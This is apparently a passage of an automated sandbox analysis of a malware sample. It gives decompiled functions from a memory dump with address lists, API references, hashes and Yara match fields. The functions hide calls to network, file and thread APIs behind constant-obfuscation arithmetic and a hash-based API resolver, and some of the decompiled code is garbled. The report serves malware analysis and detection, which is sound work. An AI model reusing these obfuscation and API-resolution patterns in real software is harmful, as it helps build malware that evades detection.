				asm("stosd");
				_v24 = 0xc39ad4;
				_v24 = _v24 ^ 0x5057486c;
				_v24 = _v24 << 0xb;
				_v24 = _v24 ^ 0xa692d2a0;
				_v28 = 0x25917b;
				_v28 = _v28 >> 1;
				_v28 = _v28 + 0xbd83;
				_v28 = _v28 << 0xb;
				_v28 = _v28 ^ 0x9c3a575b;
				_v20 = 0x82d483;
				_v20 = _v20 | 0x1246382b;
				_v20 = _v20 ^ 0x12c4b1ff;
				E009B0A93(0xa4bb217a, 0x188, __ecx, __ecx, 0x746d919);
				_t43 = HttpOpenRequestW(_a4, _t44, _a24, 0, 0, 0, _t49, 0); // executed
				return _t43;
			}












                          0x009ba000
                          0x009ba002
                          0x009ba003
                          0x009ba007
                          0x009ba009
                          0x009ba00a
                          0x009ba00e
                          0x009ba012
                          0x009ba016
                          0x009ba017
                          0x009ba01b
                          0x009ba01c
                          0x009ba020
                          0x009ba024
                          0x009ba025
                          0x009ba026
                          0x009ba02b
                          0x009ba03c
                          0x009ba042
                          0x009ba04a
                          0x009ba050
                          0x009ba058
                          0x009ba060
                          0x009ba065
                          0x009ba06d
                          0x009ba075
                          0x009ba079
                          0x009ba081
                          0x009ba086
                          0x009ba08e
                          0x009ba096
                          0x009ba09e
                          0x009ba0b2
                          0x009ba0c8
                          0x009ba0d1

                          APIs
                          • HttpOpenRequestW.WININET(?,?,?,00000000,00000000,00000000,21C820C1,00000000,00000188,?,?,0746D919), ref: 009BA0C8
                          Strings
                          Memory Dump Source
                          • Source File: 0000001A.00000002.813526904.00000000009A0000.00000040.00000010.sdmp, Offset: 009A0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: HttpOpenRequest
                          • String ID: lHWP
                          • API String ID: 1984915467-2964115896
                          • Opcode ID: 7924e8e413328e6682895337f711bd0565d679efa0086e1dd5100c962c9616e0
                          • Instruction ID: efd87ad6805f227ac4bbbdfb7b915b99111c89dcc0d9232bf820c7829cd4ccd9
                          • Opcode Fuzzy Hash: 7924e8e413328e6682895337f711bd0565d679efa0086e1dd5100c962c9616e0
                          • Instruction Fuzzy Hash: 71215871108384ABD3019F96CC0989BFFE9FBC9798F400A4CF68962131D3B69A559B67
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 009BB302, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58fileCOMMON
                          Download Yara Rule
                          C-Code - Quality: 45%
                          			E009BB302(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, long _a12, long _a16, long _a20, intOrPtr _a24, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, long _a44) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				void* _t39;
				void* _t46;
				WCHAR* _t51;

				_push(_a44);
				_t51 = __ecx;
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(__ecx);
				E009A358A(_t39);
				_v12 = 0xabd0b8;
				_v12 = _v12 + 0xffff6325;
				_v12 = _v12 * 0x60;
				_v12 = _v12 ^ 0x403e2218;
				_v8 = 0xe243e7;
				_v8 = _v8 ^ 0x6b1afc39;
				_v8 = _v8 << 4;
				_v8 = _v8 >> 0xe;
				_v8 = _v8 ^ 0x000f51a2;
				_v16 = 0xa9cd65;
				_v16 = _v16 + 0xffffba9e;
				_v16 = _v16 ^ 0x00a555a0;
				E009B0A93(0xa533cd3f, 0x1ae, __ecx, __ecx, 0x97da6f6d);
				_t46 = CreateFileW(_t51, _a12, _a44, 0, _a20, _a16, 0); // executed
				return _t46;
			}









                          0x009bb30a
                          0x009bb30f
                          0x009bb311
                          0x009bb314
                          0x009bb317
                          0x009bb31a
                          0x009bb31b
                          0x009bb31e
                          0x009bb321
                          0x009bb324
                          0x009bb327
                          0x009bb32a
                          0x009bb32d
                          0x009bb32e
                          0x009bb32f
                          0x009bb334
                          0x009bb33e
                          0x009bb350
                          0x009bb358
                          0x009bb35f
                          0x009bb366
                          0x009bb36d
                          0x009bb371
                          0x009bb375
                          0x009bb37c
                          0x009bb383
                          0x009bb38a
                          0x009bb39f
                          0x009bb3b6
                          0x009bb3bd

                          APIs
                          • CreateFileW.KERNEL32(?,001B4CA2,?,00000000,?,001B4CA2,00000000), ref: 009BB3B6
                          Strings
                          Memory Dump Source
                          • Source File: 0000001A.00000002.813526904.00000000009A0000.00000040.00000010.sdmp, Offset: 009A0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: CreateFile
                          • String ID: C
                          • API String ID: 823142352-2531096973
                          • Opcode ID: 02643da8fa393edeb85a6142ec268a378f78e8aefceffacbf34586c294ec5509
                          • Instruction ID: 104a1d7714a41066198c58c8552ec5e60348dcd8e932f0c2aec9d7eed7b925e3
                          • Opcode Fuzzy Hash: 02643da8fa393edeb85a6142ec268a378f78e8aefceffacbf34586c294ec5509
                          • Instruction Fuzzy Hash: FD21E07690120DBBCF069FA5CD4ACCEBFB5FF88314F508188FA1462120D3729A65EB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 009AAD82, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56threadCOMMON
                          Download Yara Rule
                          C-Code - Quality: 55%
                          			E009AAD82(void* __ecx, void* __edx, intOrPtr _a4, void* _a8, intOrPtr _a20, intOrPtr _a24, intOrPtr _a32, _Unknown_base(*)()* _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				struct _SECURITY_ATTRIBUTES* _v20;
				intOrPtr _v24;
				void* _t39;
				void* _t46;

				_push(_a36);
				_push(_a32);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(0);
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(__ecx);
				E009A358A(_t39);
				_v24 = 0xf4be66;
				_v20 = 0;
				_v12 = 0x3b9d75;
				_v12 = _v12 << 0xa;
				_v12 = _v12 + 0x7ce8;
				_v12 = _v12 | 0x4fa6cfc0;
				_v12 = _v12 ^ 0xefffb24f;
				_v8 = 0x108f40;
				_v8 = _v8 + 0x170b;
				_v8 = _v8 >> 3;
				_v8 = _v8 * 0x2d;
				_v8 = _v8 ^ 0x0057cdb1;
				_v16 = 0x125425;
				_v16 = _v16 + 0xffffb95c;
				_v16 = _v16 + 0x77fb;
				_v16 = _v16 ^ 0x0012350a;
				E009B0A93(0x15285446, 0x192, __ecx, __ecx, 0x97da6f6d);
				_t46 = CreateThread(0, 0, _a36, _a8, 0, 0); // executed
				return _t46;
			}










                          0x009aad89
                          0x009aad8e
                          0x009aad91
                          0x009aad92
                          0x009aad95
                          0x009aad98
                          0x009aad99
                          0x009aad9a
                          0x009aad9d
                          0x009aada0
                          0x009aada1
                          0x009aada2
                          0x009aada7
                          0x009aadb1
                          0x009aadb4
                          0x009aadbb
                          0x009aadbf
                          0x009aadc6
                          0x009aadcd
                          0x009aadd4
                          0x009aaddb
                          0x009aade2
                          0x009aadf6
                          0x009aadfe
                          0x009aae05
                          0x009aae0c
                          0x009aae13
                          0x009aae1a
                          0x009aae2a
                          0x009aae3c
                          0x009aae42

                          APIs
                          • CreateThread.KERNEL32(00000000,00000000,?,0012350A,00000000,00000000), ref: 009AAE3C
                          Strings
                          Memory Dump Source
                          • Source File: 0000001A.00000002.813526904.00000000009A0000.00000040.00000010.sdmp, Offset: 009A0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: CreateThread
                          • String ID: |
                          • API String ID: 2422867632-1770183357
                          • Opcode ID: 7a3c34a36c1cf58b23beaf6eae225b3ec5089031d12a364499a6f3ca255f16cf
                          • Instruction ID: 1a82312a47d003a75e7c81f550cdfad631117eb6e197d74b071b0461e91b9bed
                          • Opcode Fuzzy Hash: 7a3c34a36c1cf58b23beaf6eae225b3ec5089031d12a364499a6f3ca255f16cf
                          • Instruction Fuzzy Hash: 3F11F2B2C01218FBCF159FA5C9498CEBFB5EF08364F108189F91866251D3B59B54DB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 009BDF9D, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48COMMON
                          Download Yara Rule
                          C-Code - Quality: 58%
                          			E009BDF9D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				void* _t36;
				intOrPtr* _t44;
				void* _t45;
				signed int _t47;
				void* _t52;

				_t52 = __edx;
				E009A358A(_t36);
				_v16 = 0xaf4d41;
				_v16 = _v16 ^ 0xba3333a0;
				_v16 = _v16 + 0xffff8a6f;
				_v16 = _v16 ^ 0xba98301d;
				_v12 = 0x608387;
				_t47 = 0x1c;
				_v12 = _v12 * 0x6c;
				_v12 = _v12 + 0xffff5bfa;
				_v12 = _v12 >> 0x10;
				_v12 = _v12 ^ 0x0002e399;
				_v8 = 0xa164e2;
				_v8 = _v8 ^ 0x4e603670;
				_v8 = _v8 / _t47;
				_v8 = _v8 + 0xccff;
				_v8 = _v8 ^ 0x02d8195f;
				_t44 = E009B0A93(0xc1cd9bca, 0xe7, _t47, _t47, 0x97da6f6d);
				_t45 =  *_t44(_t52, __ecx, __edx, _a4, _a8, _a12); // executed
				return _t45;
			}











                          0x009bdfa7
                          0x009bdfb1
                          0x009bdfb6
                          0x009bdfc0
                          0x009bdfc9
                          0x009bdfd0
                          0x009bdfd7
                          0x009bdfe4
                          0x009bdfeb
                          0x009bdfee
                          0x009bdff5
                          0x009bdff9
                          0x009be000
                          0x009be007
                          0x009be014
                          0x009be01c
                          0x009be023
                          0x009be038
                          0x009be041
                          0x009be047

                          APIs
                          • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 009BE041
                          Strings
                          Memory Dump Source
                          • Source File: 0000001A.00000002.813526904.00000000009A0000.00000040.00000010.sdmp, Offset: 009A0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: InfoNativeSystem
                          • String ID: p6`N
                          • API String ID: 1721193555-2651120018
                          • Opcode ID: b2ccfaa20201fb6d9a58c76707d0bd3f1828d7bfeecc0cb438486a9b280a1910
                          • Instruction ID: 390f4fd10032f0a23978db6eef18f387d54cbd8cad022e133d6e166f2980f675
                          • Opcode Fuzzy Hash: b2ccfaa20201fb6d9a58c76707d0bd3f1828d7bfeecc0cb438486a9b280a1910
                          • Instruction Fuzzy Hash: AD112275D01208FBDB08EFE8C90A8DEBFB5EB44320F10C189E418A7250D7B89B019F80
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 009A18DF, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47networkCOMMON
                          Download Yara Rule
                          C-Code - Quality: 45%
                          			E009A18DF(signed int __eax, signed int __ebx, signed int __ecx, signed int __edx, void* __edi, void* __esi, signed long long __fp0, void* _a1, void* _a8) {
				char _v1;
				signed int _v4;
				signed int _v8;
				signed int _v12;
				intOrPtr _v13;
				signed char _t28;
				int _t35;
				signed int _t36;
				signed int _t37;
				void* _t42;
				char* _t48;
				void* _t51;
				signed int _t53;
				char* _t56;
				signed int _t64;
				signed long long _t66;

				_t66 = __fp0;
				_t42 = __edi;
				_t37 = __ecx;
				_t36 = __ebx;
				_t53 = _t51 - 0x00000001 | __eax;
				asm("loope 0x47");
				_t28 = __eax | __edx;
				while(1) {
					asm("invalid");
					asm("invalid");
					_push(_t28);
					asm("fcomp st0, st2");
					asm("rcl bh, cl");
					asm("aas");
					asm("adc dl, ch");
					asm("in eax, 0xa1");
					asm("daa");
					asm("scasd");
					asm("o16 js 0x23");
					asm("loopne 0xffffffff");
					_push(ds);
					_t41 = 0x82;
					_t66 = _t66 /  *(_t36 + 0x7f);
					 *[ds:ecx] = ss;
					if(_t53 < _t28) {
						L9:
						asm("les ecx, [ecx+eax*4]");
						asm("cld");
						asm("fucomi st0, st5");
						_t37 = _t37 &  *_t41;
						_v4 = _v4 + 0xfffffd30;
						_t14 =  &_v4;
						 *_t14 = _v4 ^ 0x7f9c4fa4;
						_t64 =  *_t14;
					} else {
						 *_t37 = ss;
						 *((intOrPtr*)(_t42 - 0x1e)) =  *((intOrPtr*)(_t42 - 0x1e)) - 0x82;
						_t41 = 0x83;
						_t36 = _t36 |  *(_t42 - 0x44);
						_t48 =  &_v1;
						if(_t36 >=  *((intOrPtr*)(_t36 - 0x16))) {
							_push(0x83);
							asm("clc");
							asm("invalid");
							asm("enter 0xfdbb, 0xd2");
							_pop(_t28);
						}
						asm("xlatb");
						_t37 = 0xae;
						_t28 = _t28 + 1;
						asm("movsd");
						asm("pushad");
						if(_t28 <= 0) {
							_t56 = _t48;
							_pop(_t49);
							asm("enter 0x8b55, 0xec");
							_push(_v1);
							_push(_t41);
							_push(0xae);
							_t28 = E009A358A(_t28);
							_v13 = 0x7ed2b1;
							_t53 = _t56 - 0xc + 0xc;
							goto L9;
						}
						L10:
						while(_t64 <= 0) {
							if(_t64 != 0) {
								continue;
							}
							asm("insd");
							goto 0x96a4;
							 *_t28 =  *_t28 + 0xc1;
							asm("insd");
							asm("clc");
							asm("insd");
							asm("clc");
							_push(cs);
							_v8 = _v8 ^ 0x00043c3a;
							_v12 = 0x85594a;
							_v12 = _v12 * 0x60;
							_v12 = _v12 ^ 0x32067144;
							E009B0A93(0xcff283f, 0x2c2, _t37, _t37, 0x746d919);
							_t35 = InternetCloseHandle(_a8); // executed
							return _t35;
						}
						continue;
					}
					goto L10;
				}
			}



















                          0x009a18df
                          0x009a18df
                          0x009a18df
                          0x009a18df
                          0x009a18e0
                          0x009a18e2
                          0x009a18e4
                          0x009a18e5
                          0x009a18e5
                          0x009a18e7
                          0x009a18e9
                          0x009a18ea
                          0x009a18f1
                          0x009a18f3
                          0x009a18f4
                          0x009a18f6
                          0x009a18f8
                          0x009a18f9
                          0x009a18fb
                          0x009a18fe
                          0x009a1900
                          0x009a1903
                          0x009a1905
                          0x009a1909
                          0x009a190c
                          0x009a194c
                          0x009a194c
                          0x009a1950
                          0x009a1951
                          0x009a1953
                          0x009a1955
                          0x009a195c
                          0x009a195c
                          0x009a195c
                          0x009a190e
                          0x009a190e
                          0x009a1910
                          0x009a1913
                          0x009a1914
                          0x009a1917
                          0x009a191b
                          0x009a191d
                          0x009a191e
                          0x009a191f
                          0x009a1922
                          0x009a1926
                          0x009a1926
                          0x009a192a
                          0x009a192b
                          0x009a192d
                          0x009a192e
                          0x009a192f
                          0x009a1930
                          0x009a1932
                          0x009a1932
                          0x009a1933
                          0x009a193a
                          0x009a193d
                          0x009a193e
                          0x009a193f
                          0x009a1944
                          0x009a194b
                          0x00000000
                          0x009a194b
                          0x00000000
                          0x009a1962
                          0x009a1964
                          0x00000000
                          0x00000000
                          0x009a1967
                          0x009a1968
                          0x009a196f
                          0x009a1972
                          0x009a1973
                          0x009a1976
                          0x009a1977
                          0x009a1978
                          0x009a1979
                          0x009a1980
                          0x009a1997
                          0x009a199f
                          0x009a19af
                          0x009a19ba
                          0x009a19bf
                          0x009a19bf
                          0x00000000
                          0x009a1962
                          0x00000000
                          0x009a190c

                          APIs
                          • InternetCloseHandle.WININET(00043C3A), ref: 009A19BA
                          Strings
                          Memory Dump Source
                          • Source File: 0000001A.00000002.813526904.00000000009A0000.00000040.00000010.sdmp, Offset: 009A0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: CloseHandleInternet
                          • String ID: Emu
                          • API String ID: 1081599783-3203347589
                          • Opcode ID: f6a51d30a51b596d596f3394f6b746e115c00cde19448cf043cb183580817d0c
                          • Instruction ID: bfcddb941fc3e86cb3333942d75f4e0ef3158ffce46df395aed126f8db1324bd
                          • Opcode Fuzzy Hash: f6a51d30a51b596d596f3394f6b746e115c00cde19448cf043cb183580817d0c
                          • Instruction Fuzzy Hash: 841139B1D0120CEFDB45DFA9C94B59EBFB8FF85314F208099E814AA254E7719B099B81
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 009A1920, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46networkCOMMON
                          Download Yara Rule
                          C-Code - Quality: 50%
                          			E009A1920(void* __eax, signed int __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, signed long long __fp0, void* _a1, void* _a8, intOrPtr _a12) {
				intOrPtr _v0;
				char _v1;
				signed int _v4;
				signed int _v8;
				signed int _v12;
				char* _t28;
				int _t35;
				signed int _t36;
				signed int _t37;
				void* _t42;
				char* _t48;
				void* _t51;
				char* _t54;
				signed int _t61;
				signed long long _t63;

				L0:
				while(1) {
					L0:
					_t63 = __fp0;
					_t42 = __edi;
					_t37 = __ecx;
					_t36 = __ebx;
					asm("enter 0xfdbb, 0xd2");
					_pop(_t28);
					do {
						L5:
						asm("xlatb");
						_t37 = 0xae;
						_t28 = _t28 + 1;
						asm("movsd");
						asm("pushad");
						if(_t28 <= 0) {
							L6:
							_t54 = _t48;
							_pop(_t49);
							asm("enter 0x8b55, 0xec");
							L7:
							_push(_a12);
							_push(_t41);
							_push(0xae);
							_t28 = E009A358A(_t28);
							_v0 = 0x7ed2b1;
							_t51 = _t54 - 0xc + 0xc;
							L8:
							asm("les ecx, [ecx+eax*4]");
							asm("cld");
							asm("fucomi st0, st5");
							_t37 = _t37 &  *_t41;
							_v4 = _v4 + 0xfffffd30;
							_t14 =  &_v4;
							 *_t14 = _v4 ^ 0x7f9c4fa4;
							_t61 =  *_t14;
							L9:
							while(_t61 <= 0) {
								if(_t61 != 0) {
									continue;
								}
								L11:
								asm("insd");
								goto 0x96a4;
								 *_t28 =  *_t28 + 0xc1;
								asm("insd");
								asm("clc");
								asm("insd");
								asm("clc");
								_push(cs);
								_v8 = _v8 ^ 0x00043c3a;
								_v12 = 0x85594a;
								_v12 = _v12 * 0x60;
								_v12 = _v12 ^ 0x32067144;
								E009B0A93(0xcff283f, 0x2c2, _t37, _t37, 0x746d919);
								_t35 = InternetCloseHandle(_a8); // executed
								return _t35;
								L12:
							}
							asm("invalid");
							asm("invalid");
							_push(_t28);
							asm("fcomp st0, st2");
							L2:
							asm("rcl bh, cl");
							asm("aas");
							asm("adc dl, ch");
							asm("in eax, 0xa1");
							asm("daa");
							asm("scasd");
							asm("o16 js 0x23");
							asm("loopne 0xffffffff");
							_push(ds);
							_t41 = 0x82;
							_t63 = _t63 /  *(_t36 + 0x7f);
							 *[ds:ecx] = ss;
							if(_t51 < _t28) {
								goto L8;
							} else {
								goto L3;
							}
						}
						goto L9;
						L3:
						 *_t37 = ss;
						 *((intOrPtr*)(_t42 - 0x1e)) =  *((intOrPtr*)(_t42 - 0x1e)) - 0x82;
						_t41 = 0x83;
						_t36 = _t36 |  *(_t42 - 0x44);
						_t48 =  &_v1;
					} while (_t36 <  *((intOrPtr*)(_t36 - 0x16)));
					_push(0x83);
					asm("clc");
					asm("invalid");
				}
			}


















                          0x009a1920
                          0x009a1920
                          0x009a1920
                          0x009a1920
                          0x009a1920
                          0x009a1920
                          0x009a1920
                          0x009a1922
                          0x009a1926
                          0x009a1927
                          0x009a1927
                          0x009a192a
                          0x009a192b
                          0x009a192d
                          0x009a192e
                          0x009a192f
                          0x009a1930
                          0x009a1932
                          0x009a1932
                          0x009a1932
                          0x009a1933
                          0x009a1934
                          0x009a193a
                          0x009a193d
                          0x009a193e
                          0x009a193f
                          0x009a1944
                          0x009a194b
                          0x009a194c
                          0x009a194c
                          0x009a1950
                          0x009a1951
                          0x009a1953
                          0x009a1955
                          0x009a195c
                          0x009a195c
                          0x009a195c
                          0x00000000
                          0x009a1962
                          0x009a1964
                          0x00000000
                          0x00000000
                          0x009a1966
                          0x009a1967
                          0x009a1968
                          0x009a196f
                          0x009a1972
                          0x009a1973
                          0x009a1976
                          0x009a1977
                          0x009a1978
                          0x009a1979
                          0x009a1980
                          0x009a1997
                          0x009a199f
                          0x009a19af
                          0x009a19ba
                          0x009a19bf
                          0x00000000
                          0x009a19bf
                          0x009a18e5
                          0x009a18e7
                          0x009a18e9
                          0x009a18ea
                          0x009a18f1
                          0x009a18f1
                          0x009a18f3
                          0x009a18f4
                          0x009a18f6
                          0x009a18f8
                          0x009a18f9
                          0x009a18fb
                          0x009a18fe
                          0x009a1900
                          0x009a1903
                          0x009a1905
                          0x009a1909
                          0x009a190c
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x009a190c
                          0x00000000
                          0x009a190e
                          0x009a190e
                          0x009a1910
                          0x009a1913
                          0x009a1914
                          0x009a1917
                          0x009a1918
                          0x009a191d
                          0x009a191e
                          0x009a191f
                          0x009a191f

                          APIs
                          • InternetCloseHandle.WININET(00043C3A), ref: 009A19BA
                          Strings
                          Memory Dump Source
                          • Source File: 0000001A.00000002.813526904.00000000009A0000.00000040.00000010.sdmp, Offset: 009A0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: CloseHandleInternet
                          • String ID: Emu
                          • API String ID: 1081599783-3203347589
                          • Opcode ID: 332a4bbba740147284e6415f0e73646282ffb3dd2faa782252393788655e39bb
                          • Instruction ID: 78a7e377104bafa56d5b25fb4466b0d54dff547571de176aa71eac4a882b1a8c
                          • Opcode Fuzzy Hash: 332a4bbba740147284e6415f0e73646282ffb3dd2faa782252393788655e39bb
                          • Instruction Fuzzy Hash: A11179B1D0020CABDB05DFA8C91A5DEBFB4FF81318F20C0C9E854AA264D3709B489F84
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 009BD666, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41COMMON
                          Download Yara Rule
                          C-Code - Quality: 89%
                          			E009BD666(void* __ecx, void* __edx, void* _a4) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t35;
				int _t42;

				_push(_a4);
				_push(__ecx);
				E009A358A(_t35);
				_v20 = _v20 & 0x00000000;
				_v28 = 0x3d78f1;
				_v24 = 0xac25d1;
				_v12 = 0x4c86c9;
				_v12 = _v12 * 0xf;
				_v12 = _v12 + 0x1b02;
				_v12 = _v12 << 5;
				_v12 = _v12 ^ 0x8f83d85a;
				_v16 = 0x3b498d;
				_v16 = _v16 ^ 0x5006b4dd;
				_v16 = _v16 + 0x5110;
				_v16 = _v16 ^ 0x50332775;
				_v8 = 0x9247fe;
				_v8 = _v8 + 0xffffd74e;
				_v8 = _v8 + 0xe410;
				_v8 = _v8 >> 3;
				_v8 = _v8 ^ 0x00100005;
				E009B0A93(0xc12a9f3f, 0x303, __ecx, __ecx, 0x97da6f6d);
				_t42 = FindClose(_a4); // executed
				return _t42;
			}











                          0x009bd66c
                          0x009bd670
                          0x009bd671
                          0x009bd676
                          0x009bd67d
                          0x009bd684
                          0x009bd68b
                          0x009bd6a2
                          0x009bd6aa
                          0x009bd6b1
                          0x009bd6b5
                          0x009bd6bc
                          0x009bd6c3
                          0x009bd6ca
                          0x009bd6d1
                          0x009bd6d8
                          0x009bd6df
                          0x009bd6e6
                          0x009bd6ed
                          0x009bd6f1
                          0x009bd701
                          0x009bd70c
                          0x009bd711

                          APIs
                          • FindClose.KERNEL32(8F83D85A), ref: 009BD70C
                          Strings
                          Memory Dump Source
                          • Source File: 0000001A.00000002.813526904.00000000009A0000.00000040.00000010.sdmp, Offset: 009A0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: CloseFind
                          • String ID: u'3P
                          • API String ID: 1863332320-3752323859
                          • Opcode ID: 36acd33d6d4ed3773567e0d983c410523f92b11806947150201a0cab7ba0153f
                          • Instruction ID: d1e0f2d8dd6f5f148652c14b4fc121ab56a23a06f219336163507efb605de965
                          • Opcode Fuzzy Hash: 36acd33d6d4ed3773567e0d983c410523f92b11806947150201a0cab7ba0153f
                          • Instruction Fuzzy Hash: 6B1112B6C0120CEBDB44DFA8C95AADEFBB4EB40308F108188E8146A251E7B45B48DF80
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 009A1934, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36networkCOMMON
                          Download Yara Rule
                          C-Code - Quality: 52%
                          			E009A1934(signed int __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, signed long long __fp0, void* _a4) {
				void* _v3;
				char _v5;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t27;
				char* _t28;
				int _t35;
				signed int _t36;
				signed int _t37;
				void* _t42;
				char* _t47;
				void* _t49;
				char* _t50;
				signed int _t57;
				signed long long _t59;

				L0:
				while(1) {
					L0:
					_t59 = __fp0;
					_t42 = __edi;
					_t37 = __ecx;
					_t36 = __ebx;
					_push(_a4);
					_push(__ecx);
					_t28 = E009A358A(_t27);
					_v8 = 0x7ed2b1;
					_t50 = _t49 + 0xc;
					while(1) {
						L8:
						asm("les ecx, [ecx+eax*4]");
						asm("cld");
						asm("fucomi st0, st5");
						_t37 = _t37 &  *_t41;
						_v8 = _v8 + 0xfffffd30;
						_t14 =  &_v8;
						 *_t14 = _v8 ^ 0x7f9c4fa4;
						_t57 =  *_t14;
						L9:
						while(_t57 > 0) {
							asm("invalid");
							asm("invalid");
							_push(_t28);
							asm("fcomp st0, st2");
							L2:
							asm("rcl bh, cl");
							asm("aas");
							asm("adc dl, ch");
							asm("in eax, 0xa1");
							asm("daa");
							asm("scasd");
							asm("o16 js 0x23");
							asm("loopne 0xffffffff");
							_push(ds);
							_t41 = 0x82;
							_t59 = _t59 /  *(_t36 + 0x7f);
							 *[ds:ecx] = ss;
							if(_t50 < _t28) {
								L8:
								asm("les ecx, [ecx+eax*4]");
								asm("cld");
								asm("fucomi st0, st5");
								_t37 = _t37 &  *_t41;
								_v8 = _v8 + 0xfffffd30;
								_t14 =  &_v8;
								 *_t14 = _v8 ^ 0x7f9c4fa4;
								_t57 =  *_t14;
							} else {
								L3:
								 *_t37 = ss;
								 *((intOrPtr*)(_t42 - 0x1e)) =  *((intOrPtr*)(_t42 - 0x1e)) - 0x82;
								_t41 = 0x83;
								_t36 = _t36 |  *(_t42 - 0x44);
								_t47 =  &_v5;
								if(_t36 >=  *((intOrPtr*)(_t36 - 0x16))) {
									L4:
									_push(0x83);
									asm("clc");
									asm("invalid");
									L5:
									asm("enter 0xfdbb, 0xd2");
									_pop(_t28);
								}
								L6:
								asm("xlatb");
								_t37 = 0xae;
								_t28 = _t28 + 1;
								asm("movsd");
								asm("pushad");
								if(_t28 <= 0) {
									L7:
									_t50 = _t47;
									asm("enter 0x8b55, 0xec");
									goto L0;
								}
							}
						}
						if(_t57 != 0) {
							goto L9;
						}
						L11:
						asm("insd");
						goto 0x96a4;
						 *_t28 =  *_t28 + 0xc1;
						asm("insd");
						asm("clc");
						asm("insd");
						asm("clc");
						_push(cs);
						_v12 = _v12 ^ 0x00043c3a;
						_v16 = 0x85594a;
						_v16 = _v16 * 0x60;
						_v16 = _v16 ^ 0x32067144;
						E009B0A93(0xcff283f, 0x2c2, _t37, _t37, 0x746d919);
						_t35 = InternetCloseHandle(_a4); // executed
						return _t35;
						L12:
					}
				}
			}



















                          0x009a1934
                          0x009a1934
                          0x009a1934
                          0x009a1934
                          0x009a1934
                          0x009a1934
                          0x009a1934
                          0x009a193a
                          0x009a193e
                          0x009a193f
                          0x009a1944
                          0x009a194b
                          0x009a194c
                          0x009a194c
                          0x009a194c
                          0x009a1950
                          0x009a1951
                          0x009a1953
                          0x009a1955
                          0x009a195c
                          0x009a195c
                          0x009a195c
                          0x00000000
                          0x009a1962
                          0x009a18e5
                          0x009a18e7
                          0x009a18e9
                          0x009a18ea
                          0x009a18f1
                          0x009a18f1
                          0x009a18f3
                          0x009a18f4
                          0x009a18f6
                          0x009a18f8
                          0x009a18f9
                          0x009a18fb
                          0x009a18fe
                          0x009a1900
                          0x009a1903
                          0x009a1905
                          0x009a1909
                          0x009a190c
                          0x009a194c
                          0x009a194c
                          0x009a1950
                          0x009a1951
                          0x009a1953
                          0x009a1955
                          0x009a195c
                          0x009a195c
                          0x009a195c
                          0x009a190e
                          0x009a190e
                          0x009a190e
                          0x009a1910
                          0x009a1913
                          0x009a1914
                          0x009a1917
                          0x009a191b
                          0x009a191d
                          0x009a191d
                          0x009a191e
                          0x009a191f
                          0x009a1920
                          0x009a1922
                          0x009a1926
                          0x009a1926
                          0x009a1927
                          0x009a192a
                          0x009a192b
                          0x009a192d
                          0x009a192e
                          0x009a192f
                          0x009a1930
                          0x009a1932
                          0x009a1932
                          0x009a1933
                          0x00000000
                          0x009a1933
                          0x009a1930
                          0x009a190c
                          0x009a1964
                          0x00000000
                          0x00000000
                          0x009a1966
                          0x009a1967
                          0x009a1968
                          0x009a196f
                          0x009a1972
                          0x009a1973
                          0x009a1976
                          0x009a1977
                          0x009a1978
                          0x009a1979
                          0x009a1980
                          0x009a1997
                          0x009a199f
                          0x009a19af
                          0x009a19ba
                          0x009a19bf
                          0x00000000
                          0x009a19bf
                          0x009a194c

                          APIs
                          • InternetCloseHandle.WININET(00043C3A), ref: 009A19BA
                          Strings
                          Memory Dump Source
                          • Source File: 0000001A.00000002.813526904.00000000009A0000.00000040.00000010.sdmp, Offset: 009A0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: CloseHandleInternet
                          • String ID: Emu
                          • API String ID: 1081599783-3203347589
                          • Opcode ID: 7f38ffd22baa6c3baa8f60bae8b082726434e20872f483a8314c490bddb0bcc9
                          • Instruction ID: ab78dcb63f25d8312a89c68aae9f10e7931e54878cfdc8110f6c57d052c09dd6
                          • Opcode Fuzzy Hash: 7f38ffd22baa6c3baa8f60bae8b082726434e20872f483a8314c490bddb0bcc9
                          • Instruction Fuzzy Hash: 980148B1D0020CFBCB04DFA5C94A89DBBB4EF40314F20C099E904A6254E3749B089F85
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 009A2C3A, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 38stringCOMMON
